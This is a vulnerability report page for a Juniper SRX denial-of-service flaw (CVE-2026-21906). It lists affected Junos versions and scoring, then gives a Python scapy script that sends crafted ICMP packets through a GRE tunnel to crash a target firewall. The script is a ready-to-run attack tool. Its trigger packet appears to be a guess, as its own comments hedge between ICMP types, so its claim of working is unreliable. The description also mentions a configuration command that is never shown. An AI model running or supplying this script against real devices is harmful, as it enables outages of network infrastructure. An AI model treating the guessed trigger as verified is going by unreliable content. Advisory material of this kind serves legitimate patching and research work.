Security Vulnerability Report
CVE-2026-21906 CVSS 7.5 HIGH


Published: 2026-01-15 21:16:06
Last Modified: 2026-01-23 19:40:34

Description

An Improper Handling of Exceptional Conditions vulnerability in the packet forwarding engine (PFE) of Juniper Networks Junos OS on SRX Series allows an unauthenticated network-based attacker sending a specific ICMP packet through a GRE tunnel to cause the PFE to crash and restart.

When PowerMode IPsec (PMI) and GRE performance acceleration are enabled and the device receives a specific ICMP packet, a crash occurs in the SRX PFE, resulting in traffic loss. PMI is enabled by default, and GRE performance acceleration can be enabled by running the configuration command shown below. PMI is a mode of operation that provides IPsec performance improvements using Vector Packet Processing.

Note that PMI with GRE performance acceleration is only supported on specific SRX platforms.

This issue affects Junos OS on the SRX Series:

* all versions before 21.4R3-S12,
* from 22.4 before 22.4R3-S8,
* from 23.2 before 23.2R2-S5,
* from 23.4 before 23.4R2-S5,
* from 24.2 before 24.2R2-S3,
* from 24.4 before 24.4R2-S1,
* from 25.2 before 25.2R1-S1, 25.2R2.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:21.4:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:21.4:r1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:21.4:r1-s1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:21.4:r1-s2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:juniper:srx1500:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:juniper:srx1600:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:juniper:srx2300:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:juniper:srx300:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:juniper:srx320:-:*:*:*:*:*:*:* - NOT VULNERABLE
Juniper Junos OS SRX Series < 21.4R3-S12
Juniper Junos OS SRX Series >= 22.4 and < 22.4R3-S8
Juniper Junos OS SRX Series >= 23.2 and < 23.2R2-S5
Juniper Junos OS SRX Series >= 23.4 and < 23.4R2-S5
Juniper Junos OS SRX Series >= 24.2 and < 24.2R2-S3
Juniper Junos OS SRX Series >= 24.4 and < 24.4R2-S1
Juniper Junos OS SRX Series >= 25.2 and < 25.2R1-S1, 25.2R2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-21906 PoC - Juniper SRX GRE ICMP DoS
# This PoC demonstrates sending a crafted ICMP packet through GRE tunnel
# to trigger PFE crash on vulnerable Juniper SRX devices
from scapy.all import IP, ICMP, GRE, send
import sys


def cve_2026_21906_poc(target_ip, gre_tunnel_ip):
    """
    Send crafted ICMP packet through GRE tunnel to trigger PFE crash

    Args:
        target_ip: Target Juniper SRX device IP
        gre_tunnel_ip: GRE tunnel endpoint IP
    """
    # Craft outer IP header for GRE encapsulation
    outer_ip = IP(src=gre_tunnel_ip, dst=target_ip)

    # GRE header with protocol type for IP encapsulation
    gre_header = GRE(proto=0x0800)

    # Craft inner IP header
    inner_ip = IP(src="10.0.0.1", dst="10.0.0.2")

    # Craft malicious ICMP packet - type/code combination that triggers the bug
    # Using redirect or destination unreachable for maximum impact
    icmp_packet = ICMP(type=5, code=1)  # ICMP Redirect (type 5), code 1: redirect for host

    # Assemble the complete packet
    packet = outer_ip / gre_header / inner_ip / icmp_packet

    print(f"[*] Sending crafted ICMP packet to {target_ip} via GRE tunnel")
    print(f"[*] Packet structure: GRE({gre_tunnel_ip} -> {target_ip}) -> ICMP")

    # Send multiple packets to ensure crash
    send(packet, count=10, inter=0.1)

    print("[+] Packets sent. Target PFE should crash and restart.")


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve_2026_21906_poc.py <target_ip> <gre_tunnel_ip>")
        sys.exit(1)

    target_ip = sys.argv[1]
    gre_tunnel_ip = sys.argv[2]
    cve_2026_21906_poc(target_ip, gre_tunnel_ip)
